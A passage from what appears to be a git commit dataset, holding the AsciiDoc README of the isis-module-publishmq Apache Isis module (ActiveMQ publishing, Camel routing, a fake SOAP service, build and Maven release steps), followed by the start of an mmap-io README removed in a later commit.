release version\n\nFor example:\n\n[source]\n----\nsh release.sh 1.13.0 \\\n 1.14.0-SNAPSHOT \\\n dan@haywood-associates.co.uk \\\n \"this is not really my passphrase\"\n----\n\nwhere\n* `$1` is the release version\n* `$2` is the snapshot version\n* `$3` is the email of the secret key (`~\/.gnupg\/secring.gpg`) to use for signing\n* `$4` is the corresponding passphrase for that secret key.\n\nOther ways of specifying the key and passphrase are available, see the `pgp-maven-plugin`'s\nhttp:\/\/kohsuke.org\/pgp-maven-plugin\/secretkey.html[documentation]).\n\nIf the script completes successfully, then push changes:\n\n[source]\n----\ngit push origin master\ngit push origin 1.13.0\n----\n\nIf the script fails to complete, then identify the cause, perform a `git reset --hard` to start over and fix the issue\nbefore trying again. Note that in the `dom`'s `pom.xml` the `nexus-staging-maven-plugin` has the\n`autoReleaseAfterClose` setting set to `true` (to automatically stage, close and the release the repo). You may want\nto set this to `false` if debugging an issue.\n\nAccording to Sonatype's guide, it takes about 10 minutes to sync, but up to 2 hours to update http:\/\/search.maven.org[search].","old_contents":"= isis-module-publishmq\n:_imagesdir: .\/\n\nimage:https:\/\/travis-ci.org\/isisaddons\/isis-module-publishmq.png?branch=master[Build Status,link=https:\/\/travis-ci.org\/isisaddons\/isis-module-publishmq]\n\nThis module, intended for use with http:\/\/isis.apache.org[Apache Isis], provides an implementation of Apache Isis` link:http:\/\/isis.apache.org\/guides\/rg.html#_rg_services-spi_manpage-PublishingService[`PublishingService`] SPI that submits an XML representation of an link:https:\/\/github.com\/apache\/isis\/blob\/master\/core\/schema\/src\/main\/resources\/org\/apache\/isis\/schema\/aim\/aim-1.0.xsd[`ActionInvocationMemento`]s to an link:http:\/\/activemq.apache.org[ActiveMQ] queue.\n\nThe example app itself also demonstrates how this action invocation event can be routed using link:http:\/\/camel.apache.org[Apache Camel]:\n\n* the payload is enriched using Apache Isis' own link:http:\/\/isis.apache.org\/guides\/ug.html#_ug_restfulobjects-viewer[Restful Objects] viewer (obtaining additional information).\n* the enriched message is used to post to a (fake) external SOAP, eg representing a General Ledger.\n\nIn addition, the example app configures link:https:\/\/jolokia.org\/[Jolokia], allowing the ActiveMQ, Camel and other JMX beans to be administered from an external console such as link:hawt.io[Hawt.io].\n\nThe diagram below shows the moving parts:\n\nimage::webapp\/src\/main\/webapp\/images\/overview.png[link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/webapp\/src\/main\/webapp\/images\/overview.png\"]\n\n\nOne of the design objectives for the PublishMq module is to allow the ActiveMQ queue (and therefore any Camel routing) to be either embedded (as in the example app) or to be remote. This is one of the reasons why the payload posted to the queue is the XML representation of a JAXB object (the `ActionInvocationMemento`).\n\nTo make the example app easier to run, the fake SOAP service representing the external system is actually deployed as a CXF servlet within the example app itself, mounted at `\/soap\/ExternalSystemAdapter\/DemoObject`. It exposes an API for the Camel routing to post to, and also exposes a query API that simply lists the messages received. Of course, \"in real life\" this external system would be running somewhere else on the network (as the diagram shows).\n\n\n\n\n== Application walk-through\n\nThe following screenshots show how the publishing service publishes the action invocation event that is then routed through to the (fake) external system using Camel:\n\n=== Installing the Fixture Data\n\nFirst, install sample data:\n\nimage::images\/010-install-fixtures.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/010-install-fixtures.png\"]\n\nThis returns the first demo object (an instance of `PublishMqDemoObject`):\n\nimage::images\/020-update-demo-object.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/020-update-demo-object.png\"]\n\n=== Invoke an action\n\nThe `updateName()` action is defined as:\n\n[source,java]\n----\n@Action(\n semantics = SemanticsOf.IDEMPOTENT,\n publishing = Publishing.ENABLED \/\/ <1>\n)\npublic PublishMqDemoObject updateName(\n @ParameterLayout(named=\"Name\") final String name) {\n setName(name);\n return this;\n}\n----\n<1> invocations of this action will be published to the configured implementation of `PublishingService`.\n\n\nInvoke the action:\n\nimage::images\/030-update-demo-object.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/030-update-demo-object.png\"]\n\nthe value of the `name` property should, of course, be updated:\n\nimage::images\/040-demo-object-updated.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/040-demo-object-updated.png\"]\n\n\n=== Camel routing\n\nThe example app defines the following Camel route (link:fixture\/routing\/src\/main\/resources\/camel-config.xml[camel-config.xml]):\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route id=\"updateFakeSoapServiceRoute\">\n <from uri=\"activemq-broker:queue:memberInteractionsQueue\"\/> <!-- 1 -->\n <unmarshal>\n <jaxb contextPath=\"org.apache.isis.schema.ixn.v1\" prettyPrint=\"true\"\/> <!-- 2 -->\n <\/unmarshal>\n <camel:process ref=\"addExchangeHeaders\"\/> <!-- 3 -->\n <camel:choice>\n <camel:when> <!-- 4 -->\n <camel:simple> <!-- 5 -->\n ${header.ixn[execution$memberIdentifier]} ==\n 'org.isisaddons.module.publishmq.fixture.dom.PublishMqDemoObject#updateName()'\n <\/camel:simple>\n <log message=\"updateName() received... \"\/>\n <camel:process ref=\"attachDomCanonicalDtoUsingRestfulObjects\"\/> <!-- 6 -->\n <camel:process ref=\"postToFakeExternalSoapService\"\/> <!-- 7 -->\n <log message=\"internalId: ${header.externalSystemInternalId}\"\/> <!-- 8 -->\n <camel:to uri=\"stream:out\"\/> <!-- 9 -->\n <\/camel:when>\n <camel:when>\n ...\n <\/camel:when>\n <\/camel:choice>\n <\/route>\n<\/camelContext>\n----\n<1> subscribe to ActiveMQ for incoming action invocation events (in XML form). This uses the internal `vm:\/\/` protocol for speed\n<2> unmarshal to a (JAXB annotated) `InteractionDto` object\n<3> using the `AddExchangeHeaders` component provided by this module to add the metadata from the `InteractionDto` to the Camel message. This allows the message to be routed\n<4> use Camel to select which sub-route to following, using...\n<5> ... the header attached earlier. The action identifier header is usually used as the predicate for selecting the sub-route\n<6> Use a processor (implemented in the example app) to attach a DTO obtained from a call to Restful Objects.\n<7> Use a processor (implemented in the example app) to post a message to the fake external SOAP service.\n<8> Log the id allocated by the fake server to the console. This will increment for each call\n<9> Log the message payload to the console. Note that this does not include any attachments\n\nThe referenced beans are defined as:\n\n[source,xml]\n----\n<bean id=\"activemq-broker\"\n class=\"org.apache.activemq.camel.component.ActiveMQComponent\">\n <property name=\"brokerURL\" value=\"vm:\/\/broker?create=false&waitForStart=5000\"\/>\n<\/bean>\n<bean id=\"addExchangeHeaders\"\n class=\"org.isisaddons.module.publishmq.dom.camel.AddExchangeHeaders\"\/> <!--1-->\n<bean id=\"attachDomCanonicalDtoUsingRestfulObjects\"\n class=\"org.isisaddons.module.publishmq.fixture.routing.AttachDemoObjectDto\"\n init-method=\"init\"> <!--2-->\n <property name=\"base\" value=\"${attachDomCanonicalDto.base}\"\/>\n <property name=\"username\" value=\"${attachDomCanonicalDto.username}\"\/>\n <property name=\"password\" value=\"${attachDomCanonicalDto.password}\"\/>\n<\/bean>\n<bean id=\"postToFakeExternalSoapService\"\n class=\"org.isisaddons.module.publishmq.fixture.routing.PostToExternalWebServiceUsingSoap\"\n init-method=\"init\"> <!--3-->\n <property name=\"endpointAddressBase\"\n value=\"${updateExternalSystemAdapter.endpointAddressBase}\"\/>\n <property name=\"endpointAddressSuffix\"\n value=\"${updateExternalSystemAdapter.endpointAddressSuffix}\"\/>\n<\/bean>\n----\n<1> adds the exchange headers for routing (step 3 in the route, above)\n<2> calls Restful Objects to obtain a DTO representing the updated entity (step 6 in the route)\n<3> calls fake SOAP service (step 7 in the route)\n\nThere are two observable side-effects from the execution of this route. Firstly, when the fake SOAP service is\ncalled, it should return an internal Id. This, along with the rest of the message payload, are logged to the console:\n\nimage::images\/050-camel-route-logging.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/050-camel-route-logging.png\"]\n\nThe screenshot also highlights the two important pieces of information used by the route: the member identifier metadata -- added as a Camel header for routing -- and the target object has was updated.\n\nSecond, we can query the fake SOAP service to se the data that was posted to it. The screenshot below uses link:http:\/\/www.soapui.org\/[SOAP UI], which can generate stub requests from the fake SOAP service's WSDL (http:\/\/localhost:8080\/soap\/ExternalSystemAdapter\/DemoObject?wsdl[http:\/\/localhost:8080\/soap\/ExternalSystemAdapter\/DemoObject?wsdl]):\n\nimage::images\/060-query-fake-server.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/060-query-fake-server.png\"]\n\n[WARNING]\n====\nThe above screenshot is out-of-date, showing the format of the aim.xsd for 1.12.x, rather than ixn.xsd for 1.13.x\n====\n\n\n=== Proxying the REST and SOAP calls\n\nTo see in a little more detail what the `attachDtoFromRestfulObjects` and `postToFakeExternalSoapService` processors actually do, we can use the venerable link:http:\/\/ws.apache.org\/tcpmon\/download.cgi[tcpmon] to act as a proxy. For example, we can set up port 6060 to forward onto port 8080:\n\nimage::images\/110-proxy-restful-objects.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/110-proxy-restful-objects.png\"]\n\nWe can similarly do the same for port 7070, also forwarding onto port 8080.\n\nThen, we can reconfigure the app to use these different ports by editing link:webapp\/src\/main\/resources\/spring.properties[`spring.properties`]:\n\n[source,ini]\n----\nattachDomCanonicalDto.base=http:\/\/localhost:6060\/restful\/\nupdateExternalSystemAdapter.endpointAddressBase=http:\/\/localhost:7070\/soap\/\n...\n----\n\nWhen we run once more, we can see that the `attachDtoFromRestfulObjects` processor uses conneg support to obtain a specific canonical DTO that represents the original `PublishedMqDemoObject` entity:\n\nimage::images\/120-conneg.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/120-conneg.png\"]\n\nUsing DTOs in this way is important because we want the Camel event bus logic to be decoupled from changes to the\ninternals of the Apache Isis app. As the screenshot shows, the processor specifies an HTTP Accept header. The\nRestful Objects viewer delegates to the configured\nlink:http:\/\/isis.apache.org\/guides\/rg.html#_rg_services-spi_manpage-ContentNegotiationService[`ContentNegotiationService`]\nSPI, which knows how to map the `PublishedMqDemoObject` entity into the requested `DemObjectDto` DTO:\n\n[source,java]\n----\n@DomainService(nature = NatureOfService.DOMAIN)\npublic class PublishMqDemoContentMappingService implements ContentMappingService {\n public Object map(\n final Object object,\n final List<MediaType> acceptableMediaTypes) {\n if(object instanceof PublishMqDemoObject) {\n final PublishMqDemoObject demoObject = (PublishMqDemoObject) object;\n final Bookmark bookmark = bookmarkService.bookmarkFor(object);\n final DemoObjectDto dto = new DemoObjectDto();\n dto.setName(demoObject.getName());\n dto.setDescription(demoObject.getDescription());\n final OidDto oidDto = bookmark.toOidDto();\n dto.setOid(oidDto);\n return dto;\n }\n return null;\n }\n @javax.inject.Inject\n private BookmarkService bookmarkService;\n}\n----\n\nThe call to the fake SOAP service meanwhile is more straightforward: we observe just the regular SOAP messages (the\nimplementation uses `wsdl2java` to create stubs, so the code is very straightforward):\n\nimage::images\/210-proxy-soapservice.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/210-proxy-soapservice.png\"]\n\n=== Jolokia and Hawt.io\n\nAs mentioned in the introduction, the example app also configures Jolokia so that consoles such as Hawt.io can be used to monitor\/administer internal JMX beans (including ActiveMQ and Camel).\n\nConfiguring Jolokia itself turns out to be as simple as updating the classpath and adding its servlet to the `web.xml`:\n\n[source,xml]\n----\n<servlet>\n <servlet-name>jolokia-agent<\/servlet-name>\n <servlet-class>org.jolokia.http.AgentServlet<\/servlet-class>\n <init-param>\n <param-name>discoveryEnabled<\/param-name>\n <param-value>false<\/param-value>\n <\/init-param>\n <init-param>\n <param-name>agentDescription<\/param-name>\n <param-value>Apache ActiveMQ<\/param-value>\n <\/init-param>\n <load-on-startup>1<\/load-on-startup>\n<\/servlet>\n<servlet-mapping>\n <servlet-name>jolokia-agent<\/servlet-name>\n <!-- using same convention as standalone ActiveMQ -->\n <url-pattern>\/api\/jolokia\/*<\/url-pattern>\n<\/servlet-mapping>\n----\n\nWith this done, we can use Hawt.io to connect to the service:\n\nimage::images\/310-connect-activemq.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/310-connect-activemq.png\"]\n\nHawt.io itself runs as a separate webapp. For testing purposes, it can also be run from the command line, eg:\n\n[source,bash]\n----\njava -jar hawtio-app-1.4.51.jar --port 9090\n----\n\n\n=== Monitoring ActiveMQ and Camel\n\nOnce connected we can navigate to the ActiveMQ tab:\n\nimage::images\/320-monitor-activemq.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/320-monitor-activemq.png\"]\n\nand similarly to the Camel tab:\n\nimage::images\/330-monitor-camel.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/330-monitor-camel.png\"]\n\n\n\n\n== How to run the Demo App\n\nThe prerequisite software is:\n\n* Java JDK 7 (nb: Isis currently does not support JDK 8)\n* http:\/\/maven.apache.org[maven 3] (3.2.x or later is recommended).\n\nTo build the demo app:\n\n[source]\n----\ngit clone https:\/\/github.com\/isisaddons\/isis-module-publishmq.git\nmvn clean install\n----\n\nTo run the demo app:\n\n[source]\n----\nmvn antrun:run -P self-host\n----\n\nThen log on using user: `sven`, password: `pass`\n\n\nIf you want to proxy the Restful Objects and\/or fake SOAP servers, then update `spring.properties` and run `tcpmon` or similar (as shown in the app walkthrough, above).\n\nHawt.io is a standalone utility that is _not_ integrated into the example webapp; if you want to run it then specify `--port` so that it runs on some other port than its default, 8080.\n\n\n\n\n\n== How to configure\/use\n\nYou can either use this module \"out-of-the-box\", or you can fork this repo and extend to your own requirements.\n\nThe module itself consists of submodules:\n\n* `dom-servicespi`, containing the `PublishingService` SPI implementation\n* `dom-camel`, that provides utility class to help route messages.\n* `dom`, parent module\n\n\n\n=== \"Out-of-the-box\"\n\nTo use \"out-of-the-box\":\n\n* update your classpath by adding importing the parent module's dependency into in your parent module's `pom.xml`: +\n+\n[source,xml]\n----\n<dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>${project.groupId}<\/groupId>\n <artifactId>isis-module-publishmq-dom<\/artifactId>\n <version>1.12.0<\/artifactId>\n <type>pom<\/type>\n <scope>import<\/scope>\n <\/dependency>\n ...\n <\/dependencies>\n<\/dependencyManagement>\n----\n\n* if using `AppManifest`, then update its `getModules()` method: +\n\n[source,xml]\n----\n @Override\n public List<Class<?>> getModules() {\n return Arrays.asList(\n ...\n org.isisaddons.module.publishmq.PublishMqModule.class,\n ...\n );\n }\n----\n\n* otherwise, in your project's `webapp` module, update your `WEB-INF\/isis.properties`. +\n+\n[source,xml]\n----\n isis.services.ServicesInstallerFromAnnotation.packagePrefix=\\\n ...\\\n org.isisaddons.module.publishmq.dom,\\\n ...\n----\n+\nYou might also need to specify the package for any new services that you have written, eg implementation of `ContentNegotiationService` or similar.\n\n* update your classpath by adding importing the `-dom-servicespi` dependency in your project's `dom` module's `pom.xml`: +\n+\n[source,xml]\n----\n<dependencies>\n <dependency>\n <groupId>org.isisaddons.module.publishmq<\/groupId>\n <artifactId>isis-module-publishmq-dom-servicespi<\/artifactId>\n <\/dependency>\n ...\n<\/dependencies>\n----\n\n* if you are using Camel for routing and want to use the `AddExchangeHeaders` utility class, then -- in the appropriate module within your app -- add the dependency: +\n+\n[source,xml]\n----\n<dependencies>\n <dependency>\n <groupId>org.isisaddons.module.publishmq<\/groupId>\n <artifactId>isis-module-publishmq-dom-camel<\/artifactId>\n <\/dependency>\n ...\n<\/dependencies>\n----\n+\nIn the example app all the Camel routing can be found in the `-fixture-routing` module.\n\n\n* configure ActiveMQ so that the publishing service implementation can post to a queue called `memberInteractionsQueue`. +\n+\nIn the example app this is done using Spring (link:webapp\/src\/main\/resources\/activemq-config.xml[activemq-config.xml]):\n+\n[source,xml]\n----\n<beans\n xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans http:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n http:\/\/activemq.apache.org\/schema\/core http:\/\/activemq.apache.org\/schema\/core\/activemq-core.xsd\">\n <broker xmlns=\"http:\/\/activemq.apache.org\/schema\/core\"\n brokerName=\"broker\"\n dataDirectory=\"${activemq.data}\"\n useShutdownHook=\"false\"\n useJmx=\"true\"\n >\n ...\n <destinations>\n <queue physicalName=\"memberInteractionsQueue\"\/>\n <\/destinations>\n ...\n <\/broker>\n<\/beans>\n----\n+\nThis is bootstrapped in the `web.xml`:\n+\n[source,xml]\n----\n<listener>\n <listener-class>org.springframework.web.context.ContextLoaderListener<\/listener-class>\n<\/listener>\n<context-param>\n <param-name>contextConfigLocation<\/param-name>\n <param-value>\n classpath:activemq-config.xml\n <\/param-value>\n<\/context-param>\n----\n\nNotes:\n\n* Check for later releases by searching http:\/\/search.maven.org\/#search|ga|1|isis-module-publishmq-dom[Maven Central Repo]).\n\n\n==== \"Out-of-the-box\" (-SNAPSHOT)\n\nIf you want to use the current `-SNAPSHOT`, then the steps are the same as above, except:\n\n* when updating the classpath, specify the appropriate -SNAPSHOT version:\n\n[source,xml]\n----\n<version>1.13.0-SNAPSHOT<\/version>\n----\n\n* add the repository definition to pick up the most recent snapshot (we use the Cloudbees continuous integration service). We suggest defining the repository in a `<profile>`:\n\n[source,xml]\n----\n<profile>\n <id>cloudbees-snapshots<\/id>\n <activation>\n <activeByDefault>true<\/activeByDefault>\n <\/activation>\n <repositories>\n <repository>\n <id>snapshots-repo<;\/id>\n <url>http:\/\/repository-estatio.forge.cloudbees.com\/snapshot\/<\/url>\n <releases>\n <enabled>false>\/enabled>\n <\/releases>\n <snapshots>\n <enabled>true<\/enabled>\n <\/snapshots>\n <\/repository>\n <\/repositories>\n<\/profile>\n----\n\n=== Forking the repo\n\nIf instead you want to extend this module's functionality, then we recommend that you fork this repo. The repo is\nstructured as follows:\n\n* `pom.xml` - parent pom\n* `dom` - the module implementation, itself a parent with submodules:\n** `dom-servicespi` - the implementation of `PublishingServiceUsingActiveMq`; depends on the Apache Isis applib\n** `dom-camel` - providing the `AddExchangeHeaders` utility for routing messages using Camel\n* `fixture` - fixtures, itself a parent with submodules:\n** `fixture-dom` - holding a sample domain objects; depends on `dom-servicespi`\n** `fixture-scripts` - holding sample fixture (data) setup scripts\n** `fixture-canonical` - defines the canonical `DemoObjectDto`, as queried for using Restful Objects. This uses `xjc` to convert the XSD into the Java DTO.\n** `fixture-canonicalmappings` - contains the implementation of `ContentMappingService` to map the `PublishMqDemoObject` entity to `DemoObjectDto` DTO\n** `fixture-routing` - contains the example Camel rout\n* `externalsystemadapter` - parent module for the fake external system exposing a SOAP web service:\n** `externalsystemadapter-wsdl` - defines the WSDL for the fake SOAP service\n** `externalsystemadapter-wsdlgen` - generates the stub classes for both client and server\n** `externalsystemadapter-fakeserver` - implementation of the fake server (embedded in the example webapp for convenience\/testing)\n* `integtests` - (TODO) integration tests for the module; depends on `fixture-dom`\n* `webapp` - demo webapp (see above screenshots); depends on `dom` and `fixture`\n\nOnly the `dom` module (with its submodules) is released to Maven Central Repo. The versions of the other modules are purposely left at `0.0.1-SNAPSHOT` because they are not intended to be released.\n\n\n\n== Also of note\n\nThe example app contains a few other little tricks that may be useful if you are looking to deploy a similar architecture for your own application.\n\n=== Generate Canonical DTO referencing Apache Isis' DTOs\n\nAs of 1.9.0 Apache Isis includes the link:http:\/\/isis.apache.org\/schema\/aim\/aim.xsd[`aim.xsd`] (action invocation memento) and http:\/\/isis.apache.org\/schema\/common\/common.xsd[`common.xsd`] (common data types) schemas. The `PublishingServiceMq` uses the `aim.xsd` schema (or rather, its Java JAXB equivalent, `ActionInvocationMemento`, directly. The `common.xsd` schema is referenced both by `aim.xsd` for its definition of bookmarks (oids) to objects.\n\nThe `common.xsd` is _also_ used by the example app in the construction of its own canonical `DemoObjectDto`, because it is `xs:import`'ed into the corresponding link:fixture\/canonical\/src\/main\/resources\/org\/isisaddons\/module\/publishmq\/fixture\/canonical\/demoobject.xsd[`demoobject.xsd`] schema (from which `DemoObjectDto` is generated). A link:fixture\/canonical\/src\/main\/resources\/org\/isisaddons\/module\/publishmq\/fixture\/canonical\/demoobject-binding.xml[binding file] is used to ensure that classes for the imported `common.xsd` are not regenerated, and that the Java import statements refer to the correct package. This is all configured in the corresponding link:fixture\/canonical\/pom.xml#L65[`pom.xml`] file.\n\n\n=== Centralized Spring configuration\n\nIn the example app Spring is used to bootstrap ActiveMQ (link:webapp\/src\/main\/resources\/activemq-config.xml[`activemq-config.xml`]), and Camel (link:fixture\/routing\/src\/main\/resources\/camel-config.xml[`camel-config.xml`]), and also the fake SOAP Subscriber (link:webapp\/src\/main\/resources\/externalSystemFakeServer-config.xml[`externalSystemFakeServer-config.xml`]). The configuration for all is centralized through a propertyPlaceholderConfigurer bean (defined in link:webapp\/src\/main\/resources\/propertyPlaceholderConfigurer-config.xml#L23[`propertyPlaceholderConfigurer-config.xml`]).\n\nThe location of the property file is specified in the link:webapp\/src\/main\/webapp\/WEB-INF\/web.xml#L44[`web.xml`]:\n\n[source,xml]\n----\n<context-param>\n <param-name>spring.config.file<\/param-name>\n <param-value>classpath:spring.properties<\/param-value>\n<\/context-param>\n----\n\nwhere link:webapp\/src\/main\/resources\/spring.properties[`spring.properties`] is:\n\n[source,ini]\n----\nactivemq.data=activemq-data\nenrichWithCanonicalDto.base=http:\/\/localhost:8080\/restful\/\nenrichWithCanonicalDto.username=sven\nenrichWithCanonicalDto.password=pass\nupdateExternalSystemAdapter.endpointAddress=http:\/\/localhost:8080\/soap\/ExternalSystemAdapter\/DemoObject\n----\n\nIf necessary the location of this config file can be overridden; see link:http:\/\/isis.apache.org\/guides\/ug.html#_ug_deployment_externalized-configuration[this topic] in the Apache Isis user guide.\n\n\n=== WSDL to Java\n\nSimilar to the way in which the .xsd schemas are converted to Java, `wsdl2java` is used to convert the fake server's WSDL to Java stubs. This WSDL can be found link:externalsystemadapter\/wsdl\/src\/main\/resources\/org\/isisaddons\/module\/publishmq\/externalsystemadapter\/wsdl\/DemoObject.wsdl[here]; the `pom.xml` configuration can be found link:https:\/\/github.com\/isisaddons\/isis-module-publishmq\/blob\/master\/externalsystemadapter\/wsdlgen\/pom.xml#L76[here].\n\n\n\n\n\n== Related Modules\/Services\n\nThe http:\/\/github.com\/isisaddons\/isis-module-publishing[Isis addons' publishing] module provides an alternative implementation of `PublishingService` SPI that publishes to a database table.\n\n\n\n\n== Known issues\n\nNone at this time.\n\n\n\n== Change Log\n\n* `1.12.0` - released against Isis 1.12.0\n* `1.11.0` - released against Isis 1.11.0.\n* `1.10.0` - released against Isis 1.10.0\n* `1.9.0` - released against Isis 1.9.0\n\n\n\n== Legal Stuff\n\n=== License\n\n[source]\n----\nCopyright 2015 Dan Haywood\n\nLicensed under the Apache License, Version 2.0 (the\n\"License\"); you may not use this file except in compliance\nwith the License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing,\nsoftware distributed under the License is distributed on an\n\"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\nKIND, either express or implied. See the License for the\nspecific language governing permissions and limitations\nunder the License.\n----\n\n=== Dependencies\n\nThe module depends on link:http:\/\/activemq.apache.org[ActiveMQ] and also link:http:\/\/camel.apache.org[Camel]. The latter can be considered optional, because that dependency only provides a supporting utility class (`AddExchangeHeaders`).\n\n\n\n\n== Maven deploy notes\n\nOnly the `dom` module is deployed, and is done so using Sonatype's OSS support (see\nhttp:\/\/central.sonatype.org\/pages\/apache-maven.html[user guide]).\n\n=== Release to Sonatype's Snapshot Repo\n\nTo deploy a snapshot, use:\n\n[source]\n----\npushd dom\nmvn clean deploy\npopd\n----\n\nThe artifacts should be available in Sonatype's\nhttps:\/\/oss.sonatype.org\/content\/repositories\/snapshots[Snapshot Repo].\n\n\n\n=== Release to Maven Central\n\nThe `release.sh` script automates the release process. It performs the following:\n\n* performs a sanity check (`mvn clean install -o`) that everything builds ok\n* bumps the `pom.xml` to a specified release version, and tag\n* performs a double check (`mvn clean install -o`) that everything still builds ok\n* releases the code using `mvn clean deploy`\n* bumps the `pom.xml` to a specified release version\n\nFor example:\n\n[source]\n----\nsh release.sh 1.13.0 \\\n 1.14.0-SNAPSHOT \\\n dan@haywood-associates.co.uk \\\n \"this is not really my passphrase\"\n----\n\nwhere\n* `$1` is the release version\n* `$2` is the snapshot version\n* `$3` is the email of the secret key (`~\/.gnupg\/secring.gpg`) to use for signing\n* `$4` is the corresponding passphrase for that secret key.\n\nOther ways of specifying the key and passphrase are available, see the `pgp-maven-plugin`'s\nhttp:\/\/kohsuke.org\/pgp-maven-plugin\/secretkey.html[documentation]).\n\nIf the script completes successfully, then push changes:\n\n[source]\n----\ngit push origin master\ngit push origin 1.13.0\n----\n\nIf the script fails to complete, then identify the cause, perform a `git reset --hard` to start over and fix the issue\nbefore trying again. Note that in the `dom`'s `pom.xml` the `nexus-staging-maven-plugin` has the\n`autoReleaseAfterClose` setting set to `true` (to automatically stage, close and the release the repo). You may want\nto set this to `false` if debugging an issue.\n\nAccording to Sonatype's guide, it takes about 10 minutes to sync, but up to 2 hours to update http:\/\/search.maven.org[search].","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"abdc39a7e0e2a009e88ffbc70fa80ef70cdc38db","subject":"rm README.adoc","message":"rm README.adoc\n","repos":"ozra\/mmap-io,ozra\/mmap-io,ozra\/mmap-io,ozra\/mmap-io,ozra\/mmap-io","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"https:\/\/travis-ci.org\/ozra\/mmap-io[image:https:\/\/travis-ci.org\/ozra\/mmap-io.svg?branch=master[Build\nStatus]]\n\n[[mmap-for-io.js-node.js]]\nMmap for Io.js \/ Node.js\n------------------------\n\nmmap(2) \/ madvise(2) \/ msync(2) for io.js \/ node.js revisited.\n\nI needed shared memory mapping and came across @bnoordhuis module\nhttps:\/\/github.com\/bnoordhuis\/node-mmap[node-mmap], only to find that it\ndidn't work with later versions of io.js (and compatibles). So out of\nneed I threw this together along with the functionality I found was\nmissing in the node-mmap: advice and sync.\n\nStrong temptations to re-order arguments to something more sane was kept\nat bay, and I kept it as mmap(2) and node-mmap for compatibility.\nNotable difference is the additional optional argument to pass a usage\nadvise in the mapping stage. I've given advise and sync more practical\narguments, out of an io.js perspective, than their C\/C++ counterparts.\n\nThe flag constants have the same crooked names as in C\/C++ to make it\nstraight forward for the user to google the net and relate to man-pages.\n\nThis is my first io.js addon and after hours wasted reading up on V8 API\nI luckily stumbled upon https:\/\/github.com\/rvagg\/nan[Native Abstractions\nfor Node]. Makes life so much easier. Hot tip!\n\n_mmap-io_ is written in C++11 and\nhttps:\/\/github.com\/gkz\/LiveScript[LiveScript].\n\nIt should be noted that mem-mapping is by nature potentially blocking,\nand _should not be used in concurrent serving\/processing applications_,\nbut rather has it's niche where multiple processes are working on the\nsame giant sets of data (thereby sparing physical memory, and load times\nif the kernel does it's job for read ahead), preferably multiple readers\nand single or none concurrent writer, to not spoil the gains by\nshitloads of mutexes. And your noble specific use case ofcourse.\n\n[[news-and-updates]]\nNews and Updates\n----------------\n\n[[version-0.9.4]]\n2015-10-10: version 0.9.4\n^^^^^^^^^^^^^^^^^^^^^^^^^\n\n* Compilation on Mac should work now. Thanks to @aeickhoff\n\n[[version-0.9.3]]\n2015-10-01: version 0.9.3\n^^^^^^^^^^^^^^^^^^^^^^^^^\n\n* Windows compatibility added. Thanks to @toxicwolf\n* Rewrote the bindings to Nan 2.0.9 API version (V8\/io\/Node hell...)\n** Had to remove the error _codes_ to get it working in the time I had\navailable (or rather - didn't have..) - error messages are still there -\nwith code in message instead. Though, usually nothing goes wrong, so\nonly the test cares ;-)\n* Added some helpful targets in Makefile `human_errors`, `ls` only,\n`build` only, etc. (useful if you wanna hack the module)\n* Since all _functionality_ that can possibly be is in place, I bumped\nall the way to 0.8. Not battle tested enough to warrant higher.\n* Commented away experimental async read-ahead caching when readahead\nhint was on. It hasn't broken, but it's an unnecessary risk. Plays safe.\nYou can toy with it yourself if you want to try to milk out some _ms_\nperformance.\n\n[[version-0.1.3]]\n2015-03-04: version 0.1.3\n^^^^^^^^^^^^^^^^^^^^^^^^^\n\n* This is the first public commit, and the code has one day of\ndevelopment put into it as of now. More tests are needed so don't count\non it being production ready just yet (but soon).\n\n[[install]]\nInstall\n-------\n\n-------------------\nnpm install mmap-io\n-------------------\n\nor as git clone:\n\n---------------------------------------------\ngit clone https:\/\/github.com\/ozra\/mmap-io.git\ncd mmap-io\nmake\n---------------------------------------------\n\nFor dev'ing, there are some shell-scripts for just building individual\nparts, the Makefile is more of convenience and does the whole hoola\nbaloo including configuring.\n\n[[usage]]\nUsage\n-----\n\n*Note: All code in examples are in LiveScript*\n\ncode,livescript--------------------------------------------------------------------------------------------------------------------------\ncode,livescript\n\n# Following code is plastic fruit; not t[ae]sted...\n\nmmap = require \"mmap-io\"\nfs = require \"fs\"\n\nsome-file = \".\/foo.bar\"\n\nfd = fs.open-sync some-file, \"r\"\nfd-w = fs.open-sync some-file, \"r+\"\n\n# In the following comments, `[blah]` denotes optional argument,\n# `foo = x` denotes default values for arguments\n\n# map( size, protection, privacy, fd [, offset = 0 